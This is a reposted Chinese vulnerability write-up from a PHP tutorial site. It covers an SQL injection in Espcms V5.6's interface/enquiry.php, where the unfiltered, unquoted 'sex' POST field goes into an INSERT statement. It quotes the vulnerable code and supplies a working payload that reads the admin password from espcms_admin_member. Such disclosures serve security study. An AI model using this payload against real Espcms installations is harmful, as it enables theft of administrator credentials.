来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] Espcms V5.6.13.04.22 UTF8 正式版某文件存在注入漏洞,可获取管理员帐号和密码在文件\interface\enquiry.php:function in_enquirysave() { parent::start_pagetemplate(); $this-fun-formpathve......
|
Espcms V5.6.13.04.22 UTF8 正式版某文件存在注入漏洞,可获取管理员帐号和密码
function in_enquirysave() {
parent::start_pagetemplate();
$this->fun->formpathver();
$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
if ($this->CON['is_enquiry_memclass']) {
parent::member_purview(0, $this->get_link('enquiry', array(), admin_LNG));
}
$cartid = $this->fun->eccode($this->fun->accept('ecisp_enquiry_list', 'C'), 'DECODE', db_pscode);
$cartid = stripslashes(htmlspecialchars_decode($cartid));
$uncartid = !empty($cartid) ? unserialize($cartid) : 0;
$userid = intval($this->fun->accept('userid', 'P'));
$userid = !empty($userid) ? $userid : 0;
$linkman = trim($this->fun->accept('linkman', 'P', true, true));
$email = $this->fun->accept('email', 'P');
$sex = $this->fun->accept('sex', 'P');
$sex = empty($sex) ? 0 : $sex;
$sex变量没有使用intval过滤,进入后面的sql中也没有被包含在单引号内
$db_field = 'enquirysn,userid,linkman,sex,country,province,city,district,address,zipcode,tel,fax,mobile,email,content,isclass,addtime,edittime';
$db_values = "'$enquirysn',$userid,'$linkman',$sex,$country,$province,$city,$district,'$address','$zipcode','$tel','$fax','$mobile','$email','$content',0,$addtime,0";
$this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');
sex=0,0,0,0,0,1,0,13800000000,0,13800000000,(select password from espcms_admin_member limit 1),0,0,1368528987,0)%23
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
